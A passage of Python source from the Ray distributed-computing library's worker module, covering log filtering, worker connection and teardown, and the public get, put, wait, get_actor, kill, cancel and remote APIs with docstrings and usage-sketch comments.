def filter_autoscaler_events(lines: List[str]) -> Iterator[str]:
"""Given raw log lines from the monitor, return only autoscaler events.
Autoscaler events are denoted by the ":event_summary:" magic token.
"""
global autoscaler_log_fyi_printed
if not AUTOSCALER_EVENTS:
return
# Print out autoscaler events only, ignoring other messages.
for line in lines:
if ray_constants.LOG_PREFIX_EVENT_SUMMARY in line:
if not autoscaler_log_fyi_printed:
yield ("Tip: use `ray status` to view detailed "
"cluster status. To disable these "
"messages, set RAY_SCHEDULER_EVENTS=0.")
autoscaler_log_fyi_printed = True
# The event text immediately follows the ":event_summary:"
# magic token.
yield line.split(ray_constants.LOG_PREFIX_EVENT_SUMMARY)[1]
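# e.g. a monitor line such as "...:event_summary:Adding 2 nodes of type m5.large."
# (an illustrative message) is surfaced to the driver as
# "Adding 2 nodes of type m5.large.".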
def time_string() -> str:
"""Return the relative time from the start of this job.
For example, 15m30s.
"""
delta = time.time() - t0
hours = 0
minutes = 0
while delta > 3600:
hours += 1
delta -= 3600
while delta > 60:
minutes += 1
delta -= 60
output = ""
if hours:
output += "{}h".format(hours)
if minutes:
output += "{}m".format(minutes)
output += "{}s".format(int(delta))
return output
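# e.g. 42 seconds after start this returns "42s"; 5730 seconds returns "1h35m30s".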
# When we enter a breakpoint, worker logs are automatically disabled via this.
_worker_logs_enabled = True
def print_worker_logs(data: Dict[str, str], print_file: Any):
if not _worker_logs_enabled:
return
def prefix_for(data: Dict[str, str]) -> str:
"""The PID prefix for this log line."""
if data.get("pid") in ["autoscaler", "raylet"]:
return ""
else:
res = "pid="
if data.get("actor_name"):
res = data["actor_name"] + " " + res
elif data.get("task_name"):
res = data["task_name"] + " " + res
return res
def color_for(data: Dict[str, str], line: str) -> str:
"""The color for this log line."""
if data.get("pid") == "raylet":
return colorama.Fore.YELLOW
elif data.get("pid") == "autoscaler":
if "Error:" in line or "Warning:" in line:
return colorama.Style.BRIGHT + colorama.Fore.YELLOW
else:
return colorama.Style.BRIGHT + colorama.Fore.CYAN
else:
return colorama.Fore.CYAN
if data.get("pid") == "autoscaler":
pid = "scheduler +{}".format(time_string())
lines = filter_autoscaler_events(data.get("lines", []))
else:
pid = data.get("pid")
lines = data.get("lines", [])
if data.get("ip") == data.get("localhost"):
for line in lines:
print(
"{}{}({}{}){} {}".format(colorama.Style.DIM,
color_for(data,
line), prefix_for(data),
pid, colorama.Style.RESET_ALL, line),
file=print_file)
else:
for line in lines:
print(
"{}{}({}{}, ip={}){} {}".format(colorama.Style.DIM,
color_for(data, line),
prefix_for(data), pid,
data.get("ip"),
colorama.Style.RESET_ALL,
line),
file=print_file)
def listen_error_messages_raylet(worker, threads_stopped):
"""Listen to error messages in the background on the driver.
This runs in a separate thread on the driver and pushes (error, time)
tuples to the output queue.
Args:
worker: The worker class that this thread belongs to.
threads_stopped (threading.Event): A threading event used to signal to
the thread that it should exit.
"""
worker.error_message_pubsub_client = worker.redis_client.pubsub(
ignore_subscribe_messages=True)
# Exports that are published after the call to
# error_message_pubsub_client.subscribe and before the call to
# error_message_pubsub_client.listen will still be processed in the loop.
# Really we should just subscribe to the errors for this specific job.
# However, currently all errors seem to be published on the same channel.
error_pubsub_channel = gcs_utils.RAY_ERROR_PUBSUB_PATTERN
worker.error_message_pubsub_client.psubscribe(error_pubsub_channel)
try:
if _internal_kv_initialized():
# Get any autoscaler errors that occurred before the call to
# subscribe.
error_message = _internal_kv_get(DEBUG_AUTOSCALING_ERROR)
if error_message is not None:
logger.warning(error_message.decode())
while True:
# Exit if we received a signal that we should stop.
if threads_stopped.is_set():
return
msg = worker.error_message_pubsub_client.get_message()
if msg is None:
threads_stopped.wait(timeout=0.01)
continue
pubsub_msg = gcs_utils.PubSubMessage.FromString(msg["data"])
error_data = gcs_utils.ErrorTableData.FromString(pubsub_msg.data)
job_id = error_data.job_id
if job_id not in [
worker.current_job_id.binary(),
JobID.nil().binary(),
]:
continue
error_message = error_data.error_message
if (error_data.type == ray_constants.TASK_PUSH_ERROR):
# TODO(ekl) remove task push errors entirely now that we have
# the separate unhandled exception handler.
pass
else:
logger.warning(error_message)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error(f"listen_error_messages_raylet: {e}")
finally:
# Close the pubsub client to avoid leaking file descriptors.
worker.error_message_pubsub_client.close()
@PublicAPI
@client_mode_hook(auto_init=False)
def is_initialized() -> bool:
"""Check if ray.init has been called yet.
Returns:
True if ray.init has already been called and false otherwise.
"""
return ray.worker.global_worker.connected
def connect(node,
mode=WORKER_MODE,
log_to_driver=False,
worker=global_worker,
driver_object_store_memory=None,
job_id=None,
namespace=None,
job_config=None,
runtime_env_hash=0,
worker_shim_pid=0,
startup_token=0,
ray_debugger_external=False):
"""Connect this worker to the raylet, to Plasma, and to Redis.
Args:
node (ray.node.Node): The node to connect.
mode: The mode of the worker. One of SCRIPT_MODE, WORKER_MODE, and
LOCAL_MODE.
log_to_driver (bool): If true, then output from all of the worker
processes on all nodes will be directed to the driver.
worker: The ray.Worker instance.
driver_object_store_memory: Deprecated.
job_id: The ID of job. If it's None, then we will generate one.
job_config (ray.job_config.JobConfig): The job configuration.
runtime_env_hash (int): The hash of the runtime env for this worker.
worker_shim_pid (int): The PID of the process for setup worker
runtime env.
startup_token (int): The startup token of the process assigned to
it during startup as a command line argument.
        ray_debugger_external (bool): If True, make the Ray debugger
            available externally to the node this worker is running on.
"""
# Do some basic checking to make sure we didn't call ray.init twice.
error_message = "Perhaps you called ray.init twice by accident?"
assert not worker.connected, error_message
assert worker.cached_functions_to_run is not None, error_message
# Enable nice stack traces on SIGSEGV etc.
try:
if not faulthandler.is_enabled():
faulthandler.enable(all_threads=False)
except io.UnsupportedOperation:
pass # ignore
# Create a Redis client to primary.
# The Redis client can safely be shared between threads. However,
# that is not true of Redis pubsub clients. See the documentation at
# https://github.com/andymccurdy/redis-py#thread-safety.
worker.redis_client = node.create_redis_client()
worker.gcs_client = gcs_utils.GcsClient.create_from_redis(
worker.redis_client)
_initialize_internal_kv(worker.gcs_client)
ray.state.state._initialize_global_state(
node.redis_address, redis_password=node.redis_password)
# Initialize some fields.
if mode in (WORKER_MODE, RESTORE_WORKER_MODE, SPILL_WORKER_MODE):
# We should not specify the job_id if it's `WORKER_MODE`.
assert job_id is None
job_id = JobID.nil()
else:
# This is the code path of driver mode.
if job_id is None:
job_id = ray.state.next_job_id()
if mode is not SCRIPT_MODE and mode is not LOCAL_MODE and setproctitle:
process_name = ray_constants.WORKER_PROCESS_TYPE_IDLE_WORKER
if mode is SPILL_WORKER_MODE:
process_name = (
ray_constants.WORKER_PROCESS_TYPE_SPILL_WORKER_IDLE)
elif mode is RESTORE_WORKER_MODE:
process_name = (
ray_constants.WORKER_PROCESS_TYPE_RESTORE_WORKER_IDLE)
setproctitle.setproctitle(process_name)
if not isinstance(job_id, JobID):
raise TypeError("The type of given job id must be JobID.")
# All workers start out as non-actors. A worker can be turned into an actor
# after it is created.
worker.node = node
worker.set_mode(mode)
    # For drivers, check that the version information matches the version
# information that the Ray cluster was started with.
try:
ray._private.services.check_version_info(worker.redis_client)
except Exception as e:
if mode == SCRIPT_MODE:
raise e
elif mode == WORKER_MODE:
traceback_str = traceback.format_exc()
ray._private.utils.push_error_to_driver_through_redis(
worker.redis_client,
ray_constants.VERSION_MISMATCH_PUSH_ERROR,
traceback_str,
job_id=None)
worker.lock = threading.RLock()
driver_name = ""
log_stdout_file_path = ""
log_stderr_file_path = ""
interactive_mode = False
if mode == SCRIPT_MODE:
import __main__ as main
if hasattr(main, "__file__"):
driver_name = main.__file__
else:
interactive_mode = True
driver_name = "INTERACTIVE MODE"
elif not LOCAL_MODE:
raise ValueError(
"Invalid worker mode. Expected DRIVER, WORKER or LOCAL.")
redis_address, redis_port = node.redis_address.split(":")
gcs_options = ray._raylet.GcsClientOptions(
redis_address,
int(redis_port),
node.redis_password,
)
if job_config is None:
job_config = ray.job_config.JobConfig()
if namespace is not None:
ray._private.utils.validate_namespace(namespace)
# The namespace field of job config may have already been set in code
# paths such as the client.
job_config.set_ray_namespace(namespace)
# Make sure breakpoint() in the user's code will
# invoke the Ray debugger if we are in a worker or actor process
# (but not on the driver).
if mode == WORKER_MODE:
os.environ["PYTHONBREAKPOINT"] = "ray.util.rpdb.set_trace"
else:
# Add hook to suppress worker logs during breakpoint.
os.environ["PYTHONBREAKPOINT"] = "ray.util.rpdb._driver_set_trace"
worker.ray_debugger_external = ray_debugger_external
# If it's a driver and it's not coming from ray client, we'll prepare the
# environment here. If it's ray client, the environment will be prepared
# at the server side.
if (mode == SCRIPT_MODE and not job_config.client_job
and job_config.runtime_env):
scratch_dir: str = worker.node.get_runtime_env_dir_path()
runtime_env = job_config.runtime_env or {}
runtime_env = upload_py_modules_if_needed(
runtime_env, scratch_dir, logger=logger)
runtime_env = upload_working_dir_if_needed(
runtime_env, scratch_dir, logger=logger)
# Remove excludes, it isn't relevant after the upload step.
runtime_env.pop("excludes", None)
job_config.set_runtime_env(runtime_env)
serialized_job_config = job_config.serialize()
worker.core_worker = ray._raylet.CoreWorker(
mode, node.plasma_store_socket_name, node.raylet_socket_name, job_id,
gcs_options, node.get_logs_dir_path(), node.node_ip_address,
node.node_manager_port, node.raylet_ip_address, (mode == LOCAL_MODE),
driver_name, log_stdout_file_path, log_stderr_file_path,
serialized_job_config, node.metrics_agent_port, runtime_env_hash,
worker_shim_pid, startup_token)
# Notify raylet that the core worker is ready.
worker.core_worker.notify_raylet()
if driver_object_store_memory is not None:
logger.warning("`driver_object_store_memory` is deprecated"
" and will be removed in the future.")
# Start the import thread
if mode not in (RESTORE_WORKER_MODE, SPILL_WORKER_MODE):
worker.import_thread = import_thread.ImportThread(
worker, mode, worker.threads_stopped)
worker.import_thread.start()
# If this is a driver running in SCRIPT_MODE, start a thread to print error
# messages asynchronously in the background. Ideally the scheduler would
# push messages to the driver's worker service, but we ran into bugs when
# trying to properly shutdown the driver's worker service, so we are
# temporarily using this implementation which constantly queries the
# scheduler for new error messages.
if mode == SCRIPT_MODE:
worker.listener_thread = threading.Thread(
target=listen_error_messages_raylet,
name="ray_listen_error_messages",
args=(worker, worker.threads_stopped))
worker.listener_thread.daemon = True
worker.listener_thread.start()
if log_to_driver:
global_worker_stdstream_dispatcher.add_handler(
"ray_print_logs", print_to_stdstream)
worker.logger_thread = threading.Thread(
target=worker.print_logs, name="ray_print_logs")
worker.logger_thread.daemon = True
worker.logger_thread.start()
if mode == SCRIPT_MODE:
# Add the directory containing the script that is running to the Python
# paths of the workers. Also add the current directory. Note that this
# assumes that the directory structures on the machines in the clusters
# are the same.
# When using an interactive shell, there is no script directory.
if not interactive_mode:
script_directory = os.path.abspath(os.path.dirname(sys.argv[0]))
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, script_directory))
# In client mode, if we use runtime envs with "working_dir", then
# it'll be handled automatically. Otherwise, add the current dir.
if not job_config.client_job and len(
job_config.get_runtime_env_uris()) == 0:
current_directory = os.path.abspath(os.path.curdir)
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, current_directory))
# TODO(rkn): Here we first export functions to run, then remote
# functions. The order matters. For example, one of the functions to
# run may set the Python path, which is needed to import a module used
# to define a remote function. We may want to change the order to
# simply be the order in which the exports were defined on the driver.
# In addition, we will need to retain the ability to decide what the
# first few exports are (mostly to set the Python path). Additionally,
# note that the first exports to be defined on the driver will be the
# ones defined in separate modules that are imported by the driver.
# Export cached functions_to_run.
for function in worker.cached_functions_to_run:
worker.run_function_on_all_workers(function)
worker.cached_functions_to_run = None
# Setup tracing here
if _internal_kv_get(
"tracing_startup_hook",
namespace=ray_constants.KV_NAMESPACE_TRACING):
ray.util.tracing.tracing_helper._global_is_tracing_enabled = True
if not getattr(ray, "__traced__", False):
_setup_tracing = import_from_string(
_internal_kv_get(
"tracing_startup_hook",
namespace=ray_constants.KV_NAMESPACE_TRACING).decode(
"utf-8"))
_setup_tracing()
ray.__traced__ = True
def disconnect(exiting_interpreter=False):
"""Disconnect this worker from the raylet and object store."""
# Reset the list of cached remote functions and actors so that if more
# remote functions or actors are defined and then connect is called again,
# the remote functions will be exported. This is mostly relevant for the
# tests.
worker = global_worker
if worker.connected:
# Shutdown all of the threads that we've started. TODO(rkn): This
# should be handled cleanly in the worker object's destructor and not
# in this disconnect method.
worker.threads_stopped.set()
if hasattr(worker, "import_thread"):
worker.import_thread.join_import_thread()
if hasattr(worker, "listener_thread"):
worker.listener_thread.join()
if hasattr(worker, "logger_thread"):
worker.logger_thread.join()
worker.threads_stopped.clear()
worker._session_index += 1
global_worker_stdstream_dispatcher.remove_handler("ray_print_logs")
worker.node = None # Disconnect the worker from the node.
worker.cached_functions_to_run = []
worker.serialization_context_map.clear()
try:
ray_actor = ray.actor
except AttributeError:
ray_actor = None # This can occur during program termination
if ray_actor is not None:
ray_actor.ActorClassMethodMetadata.reset_cache()
@contextmanager
def _changeproctitle(title, next_title):
if _mode() is not LOCAL_MODE:
setproctitle.setproctitle(title)
try:
yield
finally:
if _mode() is not LOCAL_MODE:
setproctitle.setproctitle(next_title)
@DeveloperAPI
def show_in_dashboard(message: str, key: str = "", dtype: str = "text"):
"""Display message in dashboard.
Display message for the current task or actor in the dashboard.
For example, this can be used to display the status of a long-running
computation.
Args:
message (str): Message to be displayed.
key (str): The key name for the message. Multiple messages under
different keys will be displayed at the same time. Messages
under the same key will be overridden.
dtype (str): The type of message for rendering. One of the
following: text, html.
"""
worker = global_worker
worker.check_connected()
acceptable_dtypes = {"text", "html"}
assert dtype in acceptable_dtypes, (
f"dtype accepts only: {acceptable_dtypes}")
message_wrapped = {"message": message, "dtype": dtype}
message_encoded = json.dumps(message_wrapped).encode()
worker.core_worker.set_webui_display(key.encode(), message_encoded)
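# Comment-only usage sketch for show_in_dashboard; `long_running_job` and
# `do_some_work` are hypothetical, and the call only makes sense from inside a
# running task or actor:
#
#   @ray.remote
#   def long_running_job():
#       for pct in range(0, 101, 10):
#           # repeated calls with the same key overwrite the previous message
#           ray.worker.show_in_dashboard(f"{pct}% done", key="progress", dtype="text")
#           do_some_work()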
# Global variable to make sure we only send out the warning once.
blocking_get_inside_async_warned = False
@PublicAPI
@client_mode_hook(auto_init=True)
def get(object_refs: Union[ray.ObjectRef, List[ray.ObjectRef]],
*,
timeout: Optional[float] = None) -> Union[Any, List[Any]]:
"""Get a remote object or a list of remote objects from the object store.
This method blocks until the object corresponding to the object ref is
available in the local object store. If this object is not in the local
object store, it will be shipped from an object store that has it (once the
object has been created). If object_refs is a list, then the objects
corresponding to each object in the list will be returned.
Ordering for an input list of object refs is preserved for each object
returned. That is, if an object ref to A precedes an object ref to B in the
input list, then A will precede B in the returned list.
This method will issue a warning if it's running inside async context,
you can use ``await object_ref`` instead of ``ray.get(object_ref)``. For
a list of object refs, you can use ``await asyncio.gather(*object_refs)``.
Args:
object_refs: Object ref of the object to get or a list of object refs
to get.
timeout (Optional[float]): The maximum amount of time in seconds to
wait before returning.
Returns:
A Python object or a list of Python objects.
Raises:
GetTimeoutError: A GetTimeoutError is raised if a timeout is set and
the get takes longer than timeout to return.
Exception: An exception is raised if the task that created the object
or that created one of the objects raised an exception.
"""
worker = global_worker
worker.check_connected()
if hasattr(
worker,
"core_worker") and worker.core_worker.current_actor_is_asyncio():
global blocking_get_inside_async_warned
if not blocking_get_inside_async_warned:
logger.warning("Using blocking ray.get inside async actor. "
"This blocks the event loop. Please use `await` "
"on object ref with asyncio.gather if you want to "
"yield execution to the event loop instead.")
blocking_get_inside_async_warned = True
with profiling.profile("ray.get"):
is_individual_id = isinstance(object_refs, ray.ObjectRef)
if is_individual_id:
object_refs = [object_refs]
if not isinstance(object_refs, list):
raise ValueError("'object_refs' must either be an object ref "
"or a list of object refs.")
# TODO(ujvl): Consider how to allow user to retrieve the ready objects.
values, debugger_breakpoint = worker.get_objects(
object_refs, timeout=timeout)
for i, value in enumerate(values):
if isinstance(value, RayError):
if isinstance(value, ray.exceptions.ObjectLostError):
worker.core_worker.dump_object_store_memory_usage()
if isinstance(value, RayTaskError):
raise value.as_instanceof_cause()
else:
raise value
if is_individual_id:
values = values[0]
if debugger_breakpoint != b"":
frame = sys._getframe().f_back
rdb = ray.util.pdb.connect_ray_pdb(
host=None,
port=None,
patch_stdstreams=False,
quiet=None,
breakpoint_uuid=debugger_breakpoint.decode()
if debugger_breakpoint else None,
debugger_external=worker.ray_debugger_external)
rdb.set_trace(frame=frame)
return values
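# Comment-only usage sketch for ray.get; assumes ray.init() has been called and
# `square` is a hypothetical remote function:
#
#   @ray.remote
#   def square(x):
#       return x * x
#
#   refs = [square.remote(i) for i in range(4)]
#   ray.get(refs)                 # -> [0, 1, 4, 9], input ordering preserved
#   ray.get(refs[0], timeout=10)  # raises GetTimeoutError if not ready in 10s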
@PublicAPI
@client_mode_hook(auto_init=True)
def put(value: Any, *,
_owner: Optional["ray.actor.ActorHandle"] = None) -> ray.ObjectRef:
"""Store an object in the object store.
The object may not be evicted while a reference to the returned ID exists.
Args:
value: The Python object to be stored.
_owner: The actor that should own this object. This allows creating
objects with lifetimes decoupled from that of the creating process.
Note that the owner actor must be passed a reference to the object
prior to the object creator exiting, otherwise the reference will
still be lost.
Returns:
The object ref assigned to this value.
"""
worker = global_worker
worker.check_connected()
if _owner is None:
serialize_owner_address = None
elif isinstance(_owner, ray.actor.ActorHandle):
# Ensure `ray.state.state.global_state_accessor` is not None
ray.state.state._check_connected()
owner_address = gcs_utils.ActorTableData.FromString(
ray.state.state.global_state_accessor.get_actor_info(
_owner._actor_id)).address
if len(owner_address.worker_id) == 0:
raise RuntimeError(
f"{_owner} is not alive, it's worker_id is empty!")
serialize_owner_address = owner_address.SerializeToString()
else:
raise TypeError(
f"Expect an `ray.actor.ActorHandle`, but got: {type(_owner)}")
with profiling.profile("ray.put"):
try:
object_ref = worker.put_object(
value, owner_address=serialize_owner_address)
except ObjectStoreFullError:
logger.info(
"Put failed since the value was either too large or the "
"store was full of pinned objects.")
raise
return object_ref
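# Comment-only usage sketch for ray.put; assumes ray.init() has been called:
#
#   big_list = list(range(10**6))
#   ref = ray.put(big_list)          # store the value once in the object store
#   assert ray.get(ref) == big_list
#
# Passing `ref` to many tasks avoids re-serializing `big_list` for every call.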
# Global variable to make sure we only send out the warning once.
blocking_wait_inside_async_warned = False
@PublicAPI
@client_mode_hook(auto_init=True)
def wait(object_refs: List[ray.ObjectRef],
*,
num_returns: int = 1,
timeout: Optional[float] = None,
fetch_local: bool = True
) -> Tuple[List[ray.ObjectRef], List[ray.ObjectRef]]:
"""Return a list of IDs that are ready and a list of IDs that are not.
If timeout is set, the function returns either when the requested number of
IDs are ready or when the timeout is reached, whichever occurs first. If it
is not set, the function simply waits until that number of objects is ready
and returns that exact number of object refs.
This method returns two lists. The first list consists of object refs that
correspond to objects that are available in the object store. The second
list corresponds to the rest of the object refs (which may or may not be
ready).
Ordering of the input list of object refs is preserved. That is, if A
precedes B in the input list, and both are in the ready list, then A will
precede B in the ready list. This also holds true if A and B are both in
the remaining list.
This method will issue a warning if it's running inside an async context.
Instead of ``ray.wait(object_refs)``, you can use
``await asyncio.wait(object_refs)``.
Args:
object_refs (List[ObjectRef]): List of object refs for objects that may
or may not be ready. Note that these IDs must be unique.
num_returns (int): The number of object refs that should be returned.
timeout (float): The maximum amount of time in seconds to wait before
returning.
fetch_local (bool): If True, wait for the object to be downloaded onto
the local node before returning it as ready. If False, ray.wait()
will not trigger fetching of objects to the local node and will
return immediately once the object is available anywhere in the
cluster.
Returns:
A list of object refs that are ready and a list of the remaining object
IDs.
"""
worker = global_worker
worker.check_connected()
if hasattr(worker,
"core_worker") and worker.core_worker.current_actor_is_asyncio(
) and timeout != 0:
global blocking_wait_inside_async_warned
if not blocking_wait_inside_async_warned:
logger.debug("Using blocking ray.wait inside async method. "
"This blocks the event loop. Please use `await` "
"on object ref with asyncio.wait. ")
blocking_wait_inside_async_warned = True
if isinstance(object_refs, ObjectRef):
raise TypeError(
"wait() expected a list of ray.ObjectRef, got a single "
"ray.ObjectRef")
if not isinstance(object_refs, list):
raise TypeError("wait() expected a list of ray.ObjectRef, "
f"got {type(object_refs)}")
if timeout is not None and timeout < 0:
raise ValueError("The 'timeout' argument must be nonnegative. "
f"Received {timeout}")
for object_ref in object_refs:
if not isinstance(object_ref, ObjectRef):
raise TypeError("wait() expected a list of ray.ObjectRef, "
f"got list containing {type(object_ref)}")
worker.check_connected()
# TODO(swang): Check main thread.
with profiling.profile("ray.wait"):
# TODO(rkn): This is a temporary workaround for
# https://github.com/ray-project/ray/issues/997. However, it should be
# fixed in Arrow instead of here.
if len(object_refs) == 0:
return [], []
if len(object_refs) != len(set(object_refs)):
raise ValueError("Wait requires a list of unique object refs.")
if num_returns <= 0:
raise ValueError(
"Invalid number of objects to return %d." % num_returns)
if num_returns > len(object_refs):
raise ValueError("num_returns cannot be greater than the number "
"of objects provided to ray.wait.")
timeout = timeout if timeout is not None else 10**6
timeout_milliseconds = int(timeout * 1000)
ready_ids, remaining_ids = worker.core_worker.wait(
object_refs,
num_returns,
timeout_milliseconds,
worker.current_task_id,
fetch_local,
)
return ready_ids, remaining_ids
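# Comment-only usage sketch for ray.wait; assumes ray.init() has been called and
# `slow_task` is a hypothetical remote function:
#
#   remaining = [slow_task.remote(i) for i in range(8)]
#   while remaining:
#       done, remaining = ray.wait(remaining, num_returns=1)
#       print(ray.get(done[0]))   # handle each result as soon as it is ready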
@PublicAPI
@client_mode_hook(auto_init=True)
def get_actor(name: str,
namespace: Optional[str] = None) -> "ray.actor.ActorHandle":
"""Get a handle to a named actor.
Gets a handle to an actor with the given name. The actor must
have been created with Actor.options(name="name").remote(). This
works for both detached & non-detached actors.
Args:
name: The name of the actor.
namespace: The namespace of the actor, or None to specify the current
namespace.
Returns:
ActorHandle to the actor.
Raises:
ValueError: If the named actor does not exist.
"""
if not name:
raise ValueError("Please supply a non-empty value to get_actor")
if namespace is not None:
ray._private.utils.validate_namespace(namespace)
worker = global_worker
worker.check_connected()
return worker.core_worker.get_named_actor_handle(name, namespace or "")
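# Comment-only usage sketch for ray.get_actor; `Counter` is a hypothetical actor
# class with an `increment` method:
#
#   counter = Counter.options(name="global_counter", lifetime="detached").remote()
#   # ...later, possibly from a different driver in the same namespace:
#   handle = ray.get_actor("global_counter")
#   ray.get(handle.increment.remote())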
@PublicAPI
@client_mode_hook(auto_init=True)
def kill(actor: "ray.actor.ActorHandle", *, no_restart: bool = True):
"""Kill an actor forcefully.
This will interrupt any running tasks on the actor, causing them to fail
immediately. ``atexit`` handlers installed in the actor will not be run.
If you want to kill the actor but let pending tasks finish,
you can call ``actor.__ray_terminate__.remote()`` instead to queue a
termination task. Any ``atexit`` handlers installed in the actor *will*
be run in this case.
If the actor is a detached actor, subsequent calls to get its handle via
ray.get_actor will fail.
Args:
actor (ActorHandle): Handle to the actor to kill.
no_restart (bool): Whether or not this actor should be restarted if
it's a restartable actor.
"""
worker = global_worker
worker.check_connected()
if not isinstance(actor, ray.actor.ActorHandle):
raise ValueError("ray.kill() only supported for actors. "
"Got: {}.".format(type(actor)))
worker.core_worker.kill_actor(actor._ray_actor_id, no_restart)
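# Comment-only usage sketch for ray.kill; `actor_handle` is a hypothetical handle
# returned by SomeActor.remote():
#
#   ray.kill(actor_handle)                    # force-kill, never restart
#   ray.kill(actor_handle, no_restart=False)  # let max_restarts take effect
#
# To let queued tasks finish first, call actor_handle.__ray_terminate__.remote()
# instead, as described in the docstring above.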
@PublicAPI
@client_mode_hook(auto_init=True)
def cancel(object_ref: ray.ObjectRef,
*,
force: bool = False,
recursive: bool = True):
"""Cancels a task according to the following conditions.
If the specified task is pending execution, it will not be executed. If
the task is currently executing, the behavior depends on the ``force``
flag. When ``force=False``, a KeyboardInterrupt will be raised in Python
and when ``force=True``, the executing task will immediately exit.
If the task is already finished, nothing will happen.
Only non-actor tasks can be canceled. Canceled tasks will not be
retried (max_retries will not be respected).
Calling ray.get on a canceled task will raise a TaskCancelledError or a
WorkerCrashedError if ``force=True``.
Args:
object_ref (ObjectRef): ObjectRef returned by the task
that should be canceled.
force (boolean): Whether to force-kill a running task by killing
the worker that is running the task.
recursive (boolean): Whether to try to cancel tasks submitted by the
task specified.
Raises:
TypeError: This is raised if ``object_ref`` is not an ``ObjectRef``; it
is also raised for object refs returned by actor tasks, since only
non-actor tasks can be canceled.
"""
worker = ray.worker.global_worker
worker.check_connected()
if not isinstance(object_ref, ray.ObjectRef):
raise TypeError(
"ray.cancel() only supported for non-actor object refs. "
f"Got: {type(object_ref)}.")
return worker.core_worker.cancel_task(object_ref, force, recursive)
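# Comment-only usage sketch for ray.cancel; `blocking_task` is a hypothetical
# remote function:
#
#   ref = blocking_task.remote()
#   ray.cancel(ref)              # best effort: raises KeyboardInterrupt in the task
#   try:
#       ray.get(ref)
#   except (ray.exceptions.TaskCancelledError, ray.exceptions.WorkerCrashedError):
#       pass                     # expected when the cancellation succeeded
#
# Use ray.cancel(ref, force=True) to kill the executing worker instead.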
def _mode(worker=global_worker):
"""This is a wrapper around worker.mode.
We use this wrapper so that in the remote decorator, we can call _mode()
instead of worker.mode. The difference is that when we attempt to
serialize remote functions, we don't attempt to serialize the worker
object, which cannot be serialized.
"""
return worker.mode
def make_decorator(num_returns=None,
num_cpus=None,
num_gpus=None,
memory=None,
object_store_memory=None,
resources=None,
accelerator_type=None,
max_calls=None,
max_retries=None,
max_restarts=None,
max_task_retries=None,
runtime_env=None,
placement_group="default",
worker=None,
retry_exceptions=None,
concurrency_groups=None):
def decorator(function_or_class):
if (inspect.isfunction(function_or_class)
or is_cython(function_or_class)):
# Set the remote function default resources.
if max_restarts is not None:
raise ValueError("The keyword 'max_restarts' is not "
"allowed for remote functions.")
if max_task_retries is not None:
raise ValueError("The keyword 'max_task_retries' is not "
"allowed for remote functions.")
if num_returns is not None and (not isinstance(num_returns, int)
or num_returns < 0):
raise ValueError(
"The keyword 'num_returns' only accepts 0 or a"
" positive integer")
if max_retries is not None and (not isinstance(max_retries, int)
or max_retries < -1):
raise ValueError(
"The keyword 'max_retries' only accepts 0, -1 or a"
" positive integer")
if max_calls is not None and (not isinstance(max_calls, int)
or max_calls < 0):
raise ValueError(
"The keyword 'max_calls' only accepts 0 or a positive"
" integer")
return ray.remote_function.RemoteFunction(
Language.PYTHON, function_or_class, None, num_cpus, num_gpus,
memory, object_store_memory, resources, accelerator_type,
num_returns, max_calls, max_retries, retry_exceptions,
runtime_env, placement_group)
if inspect.isclass(function_or_class):
if num_returns is not None:
raise TypeError("The keyword 'num_returns' is not "
"allowed for actors.")
if max_retries is not None:
raise TypeError("The keyword 'max_retries' is not "
"allowed for actors.")
if retry_exceptions is not None:
raise TypeError("The keyword 'retry_exceptions' is not "
"allowed for actors.")
if max_calls is not None:
raise TypeError("The keyword 'max_calls' is not "
"allowed for actors.")
if max_restarts is not None and (not isinstance(max_restarts, int)
or max_restarts < -1):
raise ValueError(
"The keyword 'max_restarts' only accepts -1, 0 or a"
" positive integer")
if max_task_retries is not None and (not isinstance(
max_task_retries, int) or max_task_retries < -1):
raise ValueError(
"The keyword 'max_task_retries' only accepts -1, 0 or a"
" positive integer")
return ray.actor.make_actor(
function_or_class, num_cpus, num_gpus, memory,
object_store_memory, resources, accelerator_type, max_restarts,
max_task_retries, runtime_env, concurrency_groups)
raise TypeError("The @ray.remote decorator must be applied to "
"either a function or to a class.")
return decorator
@PublicAPI
def remote(*args, **kwargs):
"""Defines a remote function or an actor class.
This can be used with no arguments to define a remote function or actor as
follows:
.. code-block:: python
@ray.remote
def f():
return 1
@ray.remote
class Foo:
def method(self):
return 1
It can also be used with specific keyword arguments as follows:
.. code-block:: python
@ray.remote(num_gpus=1, max_calls=1, num_returns=2)
def f():
return 1, 2
@ray.remote(num_cpus=2, resources={"CustomResource": 1})
class Foo:
def method(self):
return 1
Remote task and actor objects returned by @ray.remote can also be
dynamically modified with the same arguments as above using
``.options()`` as follows:
.. code-block:: python
@ray.remote(num_gpus=1, max_calls=1, num_returns=2)
def f():
return 1, 2
g = f.options(num_gpus=2, max_calls=None)
@ray.remote(num_cpus=2, resources={"CustomResource": 1})
class Foo:
def method(self):
return 1
Bar = Foo.options(num_cpus=1, resources=None)
A running remote actor will be terminated when the last Python actor
handle to it is deleted, which causes it to complete any outstanding
work and then shut down. If you want to kill it immediately, you can
also call ``ray.kill(actor)``.
Args:
num_returns (int): This is only for *remote functions*. It specifies
the number of object refs returned by
the remote function invocation.
num_cpus (float): The quantity of CPU cores to reserve
for this task or for the lifetime of the actor.
num_gpus (int): The quantity of GPUs to reserve
for this task or for the lifetime of the actor.
resources (Dict[str, float]): The quantity of various custom resources
to reserve for this task or for the lifetime of the actor.
This is a dictionary mapping strings (resource names) to floats.
accelerator_type: If specified, requires that the task or actor run
on a node with the specified type of accelerator.
See `ray.accelerators` for accelerator types.
max_calls (int): Only for *remote functions*. This specifies the
maximum number of times that a given worker can execute
the given remote function before it must exit
(this can be used to address memory leaks in third-party
libraries or to reclaim resources that cannot easily be
released, e.g., GPU memory that was acquired by TensorFlow).
By default this is infinite.
max_restarts (int): Only for *actors*. This specifies the maximum
number of times that the actor should be restarted when it dies
unexpectedly. The minimum valid value is 0 (default),
which indicates that the actor doesn't need to be restarted.
A value of -1 indicates that an actor should be restarted
indefinitely.
max_task_retries (int): Only for *actors*. How many times to
retry an actor task if the task fails due to a system error,
e.g., the actor has died. If set to -1, the system will
retry the failed task until the task succeeds, or the actor
has reached its max_restarts limit. If set to `n > 0`, the
system will retry the failed task up to n times, after which the
task will throw a `RayActorError` exception upon :obj:`ray.get`.
Note that Python exceptions are not considered system errors
and will not trigger retries.
max_retries (int): Only for *remote functions*. This specifies
the maximum number of times that the remote function
should be rerun when the worker process executing it
